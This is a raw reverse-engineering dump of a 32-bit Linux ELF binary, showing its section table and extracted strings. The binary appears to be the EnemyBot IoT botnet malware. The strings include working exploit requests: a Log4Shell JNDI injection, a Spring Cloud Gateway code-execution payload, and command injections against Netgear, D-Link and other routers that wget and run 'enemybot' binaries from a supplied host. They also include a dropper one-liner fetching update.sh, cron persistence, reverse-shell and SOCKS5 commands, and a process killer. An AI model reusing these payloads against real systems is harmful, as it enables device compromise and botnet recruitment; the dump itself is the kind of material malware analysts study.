Missing bin header dwarf
[Sections]

nth paddr          size vaddr         vsize perm name
―――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000000      0x0 0x00000000      0x0 ---- 
1   0x00000094     0x1c 0x08048094     0x1c -r-x .init
2   0x000000b0  0x145d4 0x080480b0  0x145d4 -r-x .text
3   0x00014684     0x17 0x0805c684     0x17 -r-x .fini
4   0x000146a0   0x53d2 0x0805c6a0   0x53d2 -r-- .rodata
5   0x00019a74      0x4 0x08061a74      0x4 -r-- .eh_frame
6   0x00019a78      0x8 0x08062a78      0x8 -rw- .ctors
7   0x00019a80      0x8 0x08062a80      0x8 -rw- .dtors
8   0x00019a88      0x4 0x08062a88      0x4 -rw- .jcr
9   0x00019a8c      0xc 0x08062a8c      0xc -rw- .got.plt
10  0x00019aa0    0xec0 0x08062aa0    0xec0 -rw- .data
11  0x0001a960      0x0 0x08063960   0xa2c4 -rw- .bss
12  0x0001a960    0xe8e 0x00000000    0xe8e ---- .comment
13  0x0001b7ee     0x5f 0x00000000     0x5f ---- .shstrtab

[Segments]

nth paddr          size vaddr         vsize perm name
―――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000000  0x19a78 0x08048000  0x19a78 -r-x LOAD0
1   0x00019a78    0xee8 0x08062a78   0xb1ac -rw- LOAD1
2   0x00000000      0x0 0x00000000      0x0 -rw- GNU_STACK
3   0x00000000     0x34 0x08048000     0x34 -rw- ehdr

[Entrypoints]
vaddr=0x08048168 paddr=0x00000168 haddr=0x00000018 hvaddr=0x08048018 type=program

1 entrypoints
[Constructors]

0 entrypoints
[Main]
vaddr=0x08052088 paddr=0x0000a088
[Imports]
nth vaddr bind type lib name
――――――――――――――――――――――――――――

[Symbols]

nth paddr vaddr bind type size lib name
―――――――――――――――――――――――――――――――――――――――
[Strings]
nth paddr      vaddr      len size section type    string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x000146a0 0x0805c6a0 6   7    .rodata ascii   x86_32
1   0x000146a7 0x0805c6a7 62  63   .rodata ascii   0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
2   0x000146e6 0x0805c6e6 5   6    .rodata ascii   /wget
3   0x000146ec 0x0805c6ec 5   6    .rodata ascii   /curl
4   0x000146f2 0x0805c6f2 5   6    .rodata ascii   /tftp
5   0x000146f8 0x0805c6f8 5   6    .rodata ascii   /htop
6   0x000146fe 0x0805c6fe 4   5    .rodata ascii   /top
7   0x00014703 0x0805c703 5   6    .rodata ascii   /grep
8   0x0001470d 0x0805c70d 5   6    .rodata ascii   /lsof
9   0x00014713 0x0805c713 7   8    .rodata ascii   /ptrace
10  0x0001471e 0x0805c71e 5   6    .rodata ascii   %s/%s
11  0x00014724 0x0805c724 6   7    .rodata ascii   %s/%s\n
12  0x0001472b 0x0805c72b 8   9    .rodata ascii   =ru_Brf_
13  0x00014734 0x0805c734 7   8    .rodata ascii   /etc/%s
14  0x0001473e 0x0805c73e 15  16   .rodata ascii   */5 * * * * %s\n
15  0x0001474e 0x0805c74e 8   9    .rodata ascii   r=Bw\!fs
16  0x00014757 0x0805c757 15  16   .rodata ascii   memset cleared\r
17  0x00014767 0x0805c767 12  13   .rodata ascii   recv error\r\n
18  0x00014774 0x0805c774 19  20   .rodata ascii   socks type error!\r\n
19  0x00014788 0x0805c788 10  11   .rodata ascii   send error
20  0x00014793 0x0805c793 18  19   .rodata ascii   send encrypt error
21  0x000147a6 0x0805c7a6 10  11   .rodata ascii   recv error
22  0x000147b1 0x0805c7b1 7   8    .rodata ascii   %s,%s\r\n
23  0x000147b9 0x0805c7b9 14  15   .rodata ascii   encrypt error\r
24  0x000147c8 0x0805c7c8 14  15   .rodata ascii   socket error\r\n
25  0x000147d7 0x0805c7d7 19  20   .rodata ascii   not supported yet\r\n
26  0x000147eb 0x0805c7eb 26  27   .rodata ascii   resolve host %s error:%s\r\n
27  0x00014806 0x0805c806 46  47   .rodata ascii   resolve host %s error:no usable ipv4 address\r\n
28  0x00014835 0x0805c835 22  23   .rodata ascii   Socket creation failed
29  0x0001484c 0x0805c84c 27  28   .rodata ascii   send address response error
30  0x00014868 0x0805c868 25  26   .rodata ascii   connect real server error
31  0x00014882 0x0805c882 29  30   .rodata ascii   connect to server success!!!\r
32  0x000148a0 0x0805c8a0 5   6    .rodata ascii   %02x 
33  0x000148a6 0x0805c8a6 26  27   .rodata ascii   established listenning!!!\r
34  0x000148c1 0x0805c8c1 15  16   .rodata ascii   select error!!!
35  0x000148d1 0x0805c8d1 26  27   .rodata ascii   client closed  transaction
36  0x000148ec 0x0805c8ec 14  15   .rodata ascii   client exited\r
37  0x000148fb 0x0805c8fb 23  24   .rodata ascii   client requested:\r\n%s\r\n
38  0x00014913 0x0805c913 25  26   .rodata ascii   client closed transaction
39  0x0001492d 0x0805c92d 25  26   .rodata ascii   server closed transaction
40  0x00014947 0x0805c947 14  15   .rodata ascii   server exited\r
41  0x00014956 0x0805c956 23  24   .rodata ascii   server responsed:\r\n%s\r\n
42  0x00014974 0x0805c974 8   9    .rodata ascii   /net/tcp
43  0x0001497d 0x0805c97d 4   5    .rodata ascii   %s%s
44  0x000149ad 0x0805c9ad 7   8    .rodata ascii   /status
45  0x000149b5 0x0805c9b5 4   5    .rodata ascii   OKAY
46  0x000149ba 0x0805c9ba 4   5    .rodata ascii   FAIL
47  0x000149bf 0x0805c9bf 8   9    .rodata ascii   shell:%s
48  0x000149c8 0x0805c9c8 4   5    .rodata ascii   %04x
49  0x000149cd 0x0805c9cd 18  19   .rodata ascii   host:transport-any
50  0x000149e0 0x0805c9e0 4   5    .rodata ascii   %02x
51  0x000149e5 0x0805c9e5 8   9    .rodata ascii   SSDP.txt
52  0x000149ee 0x0805c9ee 90  91   .rodata ascii   M-SEARCH * HTTP/1.1\r\nHost:239.255.255.250:1900\r\nST:ssdp:all\r\nMan:"ssdp:discover"\r\nMX:3\r\n\r\n
53  0x00014a49 0x0805ca49 7   8    .rodata ascii   DNS.txt
54  0x00014a51 0x0805ca51 6   7    .rodata ascii   info: 
55  0x00014a58 0x0805ca58 4   5    .rodata ascii   USER
56  0x00014a5f 0x0805ca5f 7   8    .rodata ascii   /bin/sh
57  0x00014a8a 0x0805ca8a 42  43   .rodata ascii   %s %s HTTP/1.1\r\nConnection: %s\r\n%s: %s\r\n\r\n
58  0x00014ab5 0x0805cab5 6   7    .rodata ascii   (null)
59  0x00014abc 0x0805cabc 13  14   .rodata ascii   icanhazip.com
60  0x00014aca 0x0805caca 93  94   .rodata ascii   GET / HTTP/1.1\r\nHost: icanhazip.com\r\n%s: Mozilla/5.0\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n
61  0x00014b28 0x0805cb28 13  14   .rodata ascii   SOCKS5 %s:%s\n
62  0x00014b36 0x0805cb36 16  17   .rodata ascii   selectserver:%s\n
63  0x00014b47 0x0805cb47 6   7    .rodata ascii   listen
64  0x00014b4e 0x0805cb4e 6   7    .rodata ascii   accept
65  0x00014b55 0x0805cb55 26  27   .rodata ascii      |-Destination IP   : %s
66  0x00014b70 0x0805cb70 26  27   .rodata ascii      |-Destination Port : %u
67  0x00014b8b 0x0805cb8b 26  27   .rodata ascii      |-Source IP        : %s
68  0x00014ba6 0x0805cba6 26  27   .rodata ascii      |-Source Port      : %u
69  0x00014bc1 0x0805cbc1 26  27   .rodata ascii      |-TCP Packet count : %d
70  0x00014bdc 0x0805cbdc 20  21   .rodata ascii   \n   /-Data Payload-\
71  0x00014bf1 0x0805cbf1 20  21   .rodata ascii      \-Data Payload-/\n
72  0x00014c06 0x0805cc06 11  12   .rodata ascii   %d.%d.%d.%d
73  0x00014c12 0x0805cc12 379 380  .rodata ascii   GET / HTTP/1.1\r\nHost: %s\r\n%s: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//%s:1389/t}')\r\nReferer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//%s:1389/t}')\r\nCookie: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//%s:1389/t}')\r\nAuthentication: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//%s:1389/t}\r\n\r\n
74  0x00014d8e 0x0805cd8e 13  14   .rodata ascii   Microsoft IIS
75  0x00014d9c 0x0805cd9c 249 250  .rodata ascii   GET /CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=%s&vport=1389&vstart=&vusername=&vpassword=&returnformat=json HTTP/1.1\r\nHost: %s\r\n%s: %s\r\nAccept: */*\r\nContent-Length: 4\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n\r\n\r\n\r\n\r\n
76  0x00014e96 0x0805ce96 520 521  .rodata ascii   POST /login/login.html HTTP/1.1\nHost: %s:%d\nContent-Length: %d\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://%s:%d\nContent-Type: application/x-www-form-urlencoded\n%s: %s\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://IP_address:8081/login/login.html\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nmyname=ffUfRAgO%%60%s%%60&mypasswd=test&Submit=Login
77  0x0001509f 0x0805d09f 437 438  .rodata ascii   POST /ubus/ HTTP/1.1\nHost: %s:%d\n%s: %s\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: %d\nOrigin: https://192.168.8.1\nReferer: https://192.168.8.1/\nTe: trailers\nConnection: close\n\n{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"%s"}]}
78  0x00015255 0x0805d255 447 448  .rodata ascii   POST /actuator/gateway/routes/%d HTTP/1.1\nHost: %s:%d\nConnection: keep-alive\nAccept-Encoding: gzip, deflate\nAccept: */*\n%s: %s\nContent-Type: application/json\nContent-Length: %d\n\n{"id": "%d", "filters": [{"args": {"name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022%s\u0022).getInputStream()))}"}, "name": "AddResponseHeader"}], "uri": "http://example.com"}
79  0x00015415 0x0805d415 134 135  .rodata ascii   GET /actuator/gateway/routes/%d HTTP/1.1\nHost: %s:%d\n%s: %s\nAccept-Encoding: gzip, deflate\nAccept: */*\n%s: %s\nConnection: keep-alive\n\n
80  0x0001549c 0x0805d49c 130 131  .rodata ascii   DELETE /actuator/gateway/routes/%d HTTP/1.1\nHost: %s:%d\n%s: %s\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\n\n
81  0x0001551f 0x0805d51f 193 194  .rodata ascii   GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s/folder/enemybotmips+-O+/tmp/enemy;chmod+%2B+777+/tmp/enemy;/tmp/enemy&curpath=/&currentsetting.htm=1 HTTP/1.0\n\n
82  0x000155e1 0x0805d5e1 300 301  .rodata ascii   GET /cgi-bin/downloadFlile.cgi?payload=%%60%s%%60 HTTP/1.1 \nHost: %s\n%s: %s\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0\n\n
83  0x0001570e 0x0805d70e 271 272  .rodata ascii   POST /HNAP1/ HTTP/1.1\nHost: %s:80\n%s: %s\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nSOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`/bin/busybox+wget+http://%s/folder/enemybotmips+-O+enemy;chmod+777+enemy;./enemy`"\nContent-Length: 0\n\n
84  0x0001581e 0x0805d81e 163 164  .rodata ascii   GET /cgi-bin/;/bin/busybox+wget+http://%s/folder/enemybotmips+-O+enemy;/bin/busybox+chmod+777+enemy;./enemy\nHost: %s:80\n%s: %s\nAccept: */*\nConnection: keep-alive\n\n
85  0x000158c2 0x0805d8c2 552 553  .rodata ascii   GET /zhnping.cmd?&test=ping&sessionKey=&ipAddr=1.1.1.1;/bin/busybox%%20wget%%20http://%s/folder/enemybotmips%%20-O%%20/var/enemy;%%20chmod%%20777%%20/var/enemy;%%20/var/enemy&count=4&length=64 HTTP/1.1\nHost: %s:80\n%s: %s\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: sv-SE,sv;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: http://%s:80/diag.html\nAuthorization: Basic dXNlcjp1c2Vy\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n
86  0x00015aeb 0x0805daeb 447 448  .rodata ascii   POST /cgi-bin/ViewLog.asp HTTP/1.1\nHost: %s:80\nConnection: keep-alive\nAccept-Encoding: gzip, deflate\nAccept: */*\n%s: %s\nContent-Length: %d\nContent-Type: application/x-www-form-urlencoded\n\nremote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%%3Bcd%%20%%2Ftmp%%3Bwget%%20http%%3A%%2F%%2F%s%%2Fenemybotarm7%%3Bchmod%%20777%%20enemybotarm7%%3B.%%2Fenemybotarm7%%3Brm%%20-rf%%20enemybotarm7%%3B%%23&remoteSubmit=Save
87  0x00015cab 0x0805dcab 392 393  .rodata ascii   POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: %s\nContent-Length: %d\nAccept-Encoding: gzip, deflate\nAccept: */*\n%s: %s\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\n\npingPktSize=56&btnApply=Apply&traceMode=ping&reportIpOnlyCheckbox=on&pingTimeout=30&Command=Diagnostic&T=1646950471018&queriesCnt=3&pingIpAddr=%%3B%s&logarea=com.cgi&maxTTLCnt=30&pingCount=4&reportIpOnly=
88  0x00015e34 0x0805de34 88  89   .rodata ascii   GET /chkisg.htm%%3FSip%%3D1.1.1.1%%20%%7C%%20%s\nHost: %s\n%s: %s\nConnection: Keep-Alive\n\n
89  0x00015e8d 0x0805de8d 16  17   .rodata ascii   TEL %s:%d %s:%s\n
90  0x00015ea5 0x0805dea5 4   5    .rodata ascii   &;; 
91  0x00015eaa 0x0805deaa 8   9    .rodata ascii   <!: acam
92  0x00015eba 0x0805deba 7   8    .rodata ascii   ZOJFKRA
93  0x00015ec2 0x0805dec2 7   8    .rodata ascii   FGDCWNV
94  0x00015eca 0x0805deca 8   9    .rodata ascii   HWCLVGAJ
95  0x00015ed3 0x0805ded3 7   8    .rodata ascii   QWRRMPV
96  0x00015ee2 0x0805dee2 8   9    .rodata ascii   RCQQUMPF
97  0x00015ef1 0x0805def1 4   5    .rodata ascii   WQGP
98  0x00015ef6 0x0805def6 4   5    .rodata ascii   RCQQ
99  0x00015efb 0x0805defb 5   6    .rodata ascii   CFOKL
100 0x00015f05 0x0805df05 8   9    .rodata ascii   QOACFOKL
101 0x00015f1c 0x0805df1c 13  14   .rodata ascii   cFOKLKQVPCVMP
102 0x00015f2a 0x0805df2a 6   7    .rodata ascii   OGKLQO
103 0x00015f31 0x0805df31 6   7    .rodata ascii   RW@NKA
104 0x00015f38 0x0805df38 7   8    .rodata ascii   QGPTKAG
105 0x00015f40 0x0805df40 10  11   .rodata ascii   QWRGPTKQMP
106 0x00015f4b 0x0805df4b 5   6    .rodata ascii   EWGQV
107 0x00015f51 0x0805df51 5   6    .rodata ascii   CFOKL
108 0x00015f58 0x0805df58 13  14   .rodata ascii   CFOKLKQVPCVMP
109 0x00015f66 0x0805df66 4   5    .rodata ascii   W@LV
110 0x00015f81 0x0805df81 5   6    .rodata ascii   HT@XF
111 0x00015f87 0x0805df87 4   5    .rodata ascii   CLIM
112 0x00015f8c 0x0805df8c 5   6    .rodata ascii   XNZZ\f
113 0x00015f92 0x0805df92 8   9    .rodata ascii   AJCLEGOG
114 0x00015f9c 0x0805df9c 5   6    .rodata ascii   WHoIM
115 0x00015fa2 0x0805dfa2 5   6    .rodata ascii   TKXZT
116 0x00015fa9 0x0805dfa9 5   6    .rodata ascii   WHoIM
117 0x00015faf 0x0805dfaf 5   6    .rodata ascii   CFOKL
118 0x00015fb5 0x0805dfb5 6   7    .rodata ascii   Q[QVGO
119 0x00015fbc 0x0805dfbc 8   9    .rodata ascii   FPGCO@MZ
120 0x00015fc5 0x0805dfc5 7   8    .rodata ascii   PGCNVGI
121 0x00015fdc 0x0805dfdc 5   6    .rodata ascii   CFOKL
122 0x00015fe5 0x0805dfe5 8   9    .rodata ascii   \e\e\e\e\e\e\e\e
123 0x00015ffe 0x0805dffe 6   7    .rodata ascii   Q[LLGV
124 0x00016005 0x0805e005 8   9    .rodata ascii   @C[CLFQN
125 0x00016016 0x0805e016 7   8    .rodata ascii   MGNKLWZ
126 0x00016021 0x0805e021 4   5    .rodata ascii   VKLK
127 0x00016026 0x0805e026 6   7    .rodata ascii   CQAGLF
128 0x0001602d 0x0805e02d 5   6    .rodata ascii   FNKLI
129 0x00016033 0x0805e033 5   6    .rodata ascii   NMEKL
130 0x0001603a 0x0805e03a 4   5    .rodata ascii   PMMV
131 0x0001603f 0x0805e03f 6   7    .rodata ascii   PMWVGP
132 0x00016046 0x0805e046 8   9    .rodata ascii   AC@NGAMO
133 0x0001604f 0x0805e04f 7   8    .rodata ascii   LGVMRKC
134 0x00016057 0x0805e057 6   7    .rodata ascii   Q[QCFO
135 0x0001605e 0x0805e05e 7   8    .rodata ascii   CLKAWQV
136 0x00016066 0x0805e066 5   6    .rodata ascii   FG@WE
137 0x0001606c 0x0805e06c 6   7    .rodata ascii   QUKVAJ
138 0x00016073 0x0805e073 4   5    .rodata ascii   FKCE
139 0x00016078 0x0805e078 6   7    .rodata ascii   VGNLGV
140 0x0001608a 0x0805e08a 4   5    .rodata ascii   VMMP
141 0x0001608f 0x0805e08f 6   7    .rodata ascii   ACNTKL
142 0x00016096 0x0805e096 5   6    .rodata ascii   cfokl
143 0x000160a2 0x0805e0a2 6   7    .rodata ascii   OKAPMQ
144 0x000160a9 0x0805e0a9 5   6    .rodata ascii   QGVWR
145 0x000160af 0x0805e0af 7   8    .rodata ascii   AMOACQV
146 0x000160bb 0x0805e0bb 5   6    .rodata ascii   Cfokl
147 0x000160c1 0x0805e0c1 6   7    .rodata ascii   FCGOML
148 0x000160c8 0x0805e0c8 4   5    .rodata ascii   FGOM
149 0x000160cd 0x0805e0cd 5   6    .rodata ascii   CPPKQ
150 0x000160d3 0x0805e0d3 7   8    .rodata ascii   nKLIQ[Q
151 0x000160db 0x0805e0db 6   7    .rodata ascii   ANKGLV
152 0x000160e2 0x0805e0e2 8   9    .rodata ascii   MRGPCVMP
153 0x000160eb 0x0805e0eb 8   9    .rodata ascii   QGAWPKV[
154 0x000160f4 0x0805e0f4 12  13   .rodata ascii   CFOKLVGNGAMO
155 0x00016101 0x0805e101 12  13   .rodata ascii   VGNGAMOCFOKL
156 0x00016116 0x0805e116 6   7    .rodata ascii   EWGQV"
157 0x0001611d 0x0805e11d 5   6    .rodata ascii   enter
158 0x00016123 0x0805e123 7   8    .rodata ascii   assword
159 0x0001612b 0x0805e12b 6   7    .rodata ascii   enable
160 0x00016132 0x0805e132 6   7    .rodata ascii   system
161 0x00016139 0x0805e139 5   6    .rodata ascii   shell
162 0x0001613f 0x0805e13f 30  31   .rodata ascii   echo -e "\x65\x6e\x65\x6d\x79"
163 0x0001615e 0x0805e15e 5   6    .rodata ascii   enemy
164 0x00016164 0x0805e164 260 261  .rodata ascii   cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /data || cd /root || cd /; wget http://%s/update.sh -O update.sh; busybox wget http://%s/update.sh -O update.sh; curl http://%s/update.sh -O update.sh; chmod 777 update.sh; ./update.sh; rm -rf update.sh
165 0x00016269 0x0805e269 499 500  .rodata ascii   cd%%20%%2Ftmp%%20%%7C%%7C%%20cd%%20%%2Fhome%%2F%%24USER%%20%%7C%%7C%%20cd%%20%%2Fvar%%2Frun%%20%%7C%%7C%%20cd%%20%%2Fmnt%%20%%7C%%7C%%20cd%%20%%2Fdata%%20%%7C%%7C%%20cd%%20%%2Froot%%20%%7C%%7C%%20cd%%20%%2F%%3B%%20wget%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20busybox%%20wget%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20curl%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20chmod%%20777%%20update.sh%%3B%%20.%%2Fupdate.sh%%3B%%20rm%%20-f%%20update.sh
166 0x0001645d 0x0805e45d 29  30   .rodata ascii   [killer] killing: %s pid: %s\n
167 0x0001647b 0x0805e47b 6   7    .rodata ascii   2surf2
168 0x00016482 0x0805e482 4   5    .rodata ascii   2h{h
169 0x00016487 0x0805e487 7   8    .rodata ascii   http://
170 0x0001648f 0x0805e48f 84  85   .rodata ascii   GET /%s HTTP/1.1\r\n%s: download\r\nHost: %s:80\r\nAccept: */*\r\nConnection: Keep-Alive\r\n\r\n
171 0x000164e7 0x0805e4e7 5   6    .rodata ascii   PING\n
172 0x000164ed 0x0805e4ed 8   9    .rodata ascii   ~-6mvgmv
173 0x000164f6 0x0805e4f6 5   6    .rodata ascii   TCPON
174 0x000164fc 0x0805e4fc 6   7    .rodata ascii   RSHELL
175 0x00016503 0x0805e503 6   7    .rodata ascii   TCPOFF
176 0x0001650a 0x0805e50a 6   7    .rodata ascii   SOCKS5
177 0x00016521 0x0805e521 4   5    .rodata ascii   ecc|
178 0x00016526 0x0805e526 4   5    .rodata ascii   ej~-
179 0x0001652b 0x0805e52b 4   5    .rodata ascii   51,U
180 0x00016538 0x0805e538 7   8    .rodata ascii   6D7,,mv
181 0x00016547 0x0805e547 10  11   .rodata ascii   .~7DU,1v6m
182 0x00016552 0x0805e552 4   5    .rodata ascii   6cj|
183 0x00016557 0x0805e557 4   5    .rodata ascii   ADNS
184 0x0001655c 0x0805e55c 5   6    .rodata ascii   ASSDP
185 0x00016562 0x0805e562 53  54   .rodata ascii   perror: EWOULDBLOCK\nSegmentation fault (core dumped)\n
186 0x00016598 0x0805e598 13  14   .rodata ascii   /dev/watchdog
187 0x000165a6 0x0805e5a6 18  19   .rodata ascii   /dev/misc/watchdog
188 0x00016602 0x0805e602 4   5    .rodata ascii   f=rb
189 0x00016607 0x0805e607 6   7    .rodata ascii   %s %s\n
190 0x0001660e 0x0805e60e 4   5    .rodata ascii   |x,<
191 0x00016617 0x0805e617 4   5    .rodata ascii   upDl
192 0x00016623 0x0805e623 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
193 0x00016637 0x0805e637 4   5    .rodata ascii   PB4w
194 0x0001663d 0x0805e63d 4   5    .rodata ascii   *oB4
195 0x00016649 0x0805e649 4   5    .rodata ascii   <QwQ
196 0x00016657 0x0805e657 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
197 0x0001667a 0x0805e67a 6   9    .rodata utf8    PG뗚*4F blocks=Basic Latin,Hangul Syllables
198 0x00016696 0x0805e696 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
199 0x000166aa 0x0805e6aa 4   5    .rodata ascii   PB4w
200 0x000166b0 0x0805e6b0 4   5    .rodata ascii   *oB4
201 0x000166bc 0x0805e6bc 4   5    .rodata ascii   <QwQ
202 0x000166ca 0x0805e6ca 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
203 0x000166f2 0x0805e6f2 4   5    .rodata ascii   PP4F
204 0x0001670a 0x0805e70a 6   8    .rodata utf8    'ϗP4\eb blocks=Basic Latin,Greek and Coptic
205 0x00016718 0x0805e718 4   5    .rodata ascii   eB4h
206 0x0001671d 0x0805e71d 5   6    .rodata ascii   9Q<4b
207 0x00016724 0x0805e724 6   7    .rodata ascii   4\tF4^4
208 0x00016734 0x0805e734 4   5    .rodata ascii   <QwQ
209 0x0001673b 0x0805e73b 5   6    .rodata ascii   9'*Po
210 0x00016745 0x0805e745 6   8    .rodata utf8    4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
211 0x0001676d 0x0805e76d 4   5    .rodata ascii   '*Po
212 0x0001677e 0x0805e77e 5   7    .rodata utf8    'ϗP4\e blocks=Basic Latin,Greek and Coptic
213 0x00016795 0x0805e795 6   7    .rodata ascii   Q4\tF4G
214 0x000167a0 0x0805e7a0 4   5    .rodata ascii   xQ4b
215 0x000167a6 0x0805e7a6 5   6    .rodata ascii   4\tF4^
216 0x000167b0 0x0805e7b0 4   5    .rodata ascii   <QwQ
217 0x000167c1 0x0805e7c1 6   8    .rodata utf8    4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
218 0x00016806 0x0805e806 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
219 0x00016813 0x0805e813 4   6    .rodata utf8    4ٰ4* blocks=Basic Latin,Arabic
220 0x0001681a 0x0805e81a 9   10   .rodata ascii   B4w\tw*oB4
221 0x0001684f 0x0805e84f 6   8    .rodata utf8    'ϗP4\e^ blocks=Basic Latin,Greek and Coptic
222 0x0001685c 0x0805e85c 5   7    .rodata utf8    \tF4Z*
223 0x00016874 0x0805e874 4   5    .rodata ascii   <QwQ
224 0x00016882 0x0805e882 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
225 0x0001689d 0x0805e89d 4   5    .rodata ascii   Q'*P
226 0x000168c2 0x0805e8c2 6   8    .rodata utf8    'ϗP4\e\ blocks=Basic Latin,Greek and Coptic
227 0x000168d9 0x0805e8d9 4   5    .rodata ascii   PB4F
228 0x000168ff 0x0805e8ff 4   5    .rodata ascii   <QwQ
229 0x0001690d 0x0805e90d 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
230 0x00016931 0x0805e931 4   6    .rodata utf8    'ϗo4 blocks=Basic Latin,Greek and Coptic
231 0x00016948 0x0805e948 4   5    .rodata ascii   P*4b
232 0x0001694f 0x0805e94f 4   5    .rodata ascii   <Q4F
233 0x00016967 0x0805e967 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
234 0x0001697b 0x0805e97b 4   5    .rodata ascii   PB4w
235 0x00016981 0x0805e981 4   5    .rodata ascii   *oB4
236 0x0001698d 0x0805e98d 4   5    .rodata ascii   <QwQ
237 0x0001699b 0x0805e99b 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
238 0x000169b6 0x0805e9b6 4   5    .rodata ascii   Q'*P
239 0x000169db 0x0805e9db 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
240 0x00016a0b 0x0805ea0b 5   6    .rodata ascii   u9B4\
241 0x00016a1d 0x0805ea1d 4   5    .rodata ascii   <QwQ
242 0x00016a2b 0x0805ea2b 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
243 0x00016a59 0x0805ea59 4   5    .rodata ascii   <Q4F
244 0x00016a7f 0x0805ea7f 6   8    .rodata utf8    'ϗP4\e\ blocks=Basic Latin,Greek and Coptic
245 0x00016a98 0x0805ea98 4   6    .rodata utf8    oB4ð blocks=Basic Latin,Latin-1 Supplement
246 0x00016aad 0x0805eaad 4   5    .rodata ascii   <a'L
247 0x00016abb 0x0805eabb 4   5    .rodata ascii   <QwQ
248 0x00016ac9 0x0805eac9 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
249 0x00016aff 0x0805eaff 4   5    .rodata ascii   <Q4F
250 0x00016b17 0x0805eb17 5   7    .rodata utf8    'ϗP4\e blocks=Basic Latin,Greek and Coptic
251 0x00016b2e 0x0805eb2e 5   6    .rodata ascii   Q4\tF4
252 0x00016b3c 0x0805eb3c 4   5    .rodata ascii   xQ4b
253 0x00016b42 0x0805eb42 5   6    .rodata ascii   4\tF4^
254 0x00016b4c 0x0805eb4c 4   5    .rodata ascii   <QwQ
255 0x00016b53 0x0805eb53 4   5    .rodata ascii   9'*P
256 0x00016b5b 0x0805eb5b 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
257 0x00016b85 0x0805eb85 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
258 0x00016b92 0x0805eb92 4   6    .rodata utf8    4ٰ4* blocks=Basic Latin,Arabic
259 0x00016b9e 0x0805eb9e 4   5    .rodata ascii   *oB4
260 0x00016baa 0x0805ebaa 4   5    .rodata ascii   <QwQ
261 0x00016bb8 0x0805ebb8 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
262 0x00016bd3 0x0805ebd3 4   5    .rodata ascii   Q'*P
263 0x00016bf8 0x0805ebf8 6   8    .rodata utf8    'ϗP4\e\ blocks=Basic Latin,Greek and Coptic
264 0x00016c0b 0x0805ec0b 7   10   .rodata utf8    a4ϗPB4ü blocks=Basic Latin,Greek and Coptic,Latin-1 Supplement
265 0x00016c24 0x0805ec24 4   6    .rodata utf8    <a'ü blocks=Basic Latin,Latin-1 Supplement
266 0x00016c39 0x0805ec39 4   5    .rodata ascii   <QwQ
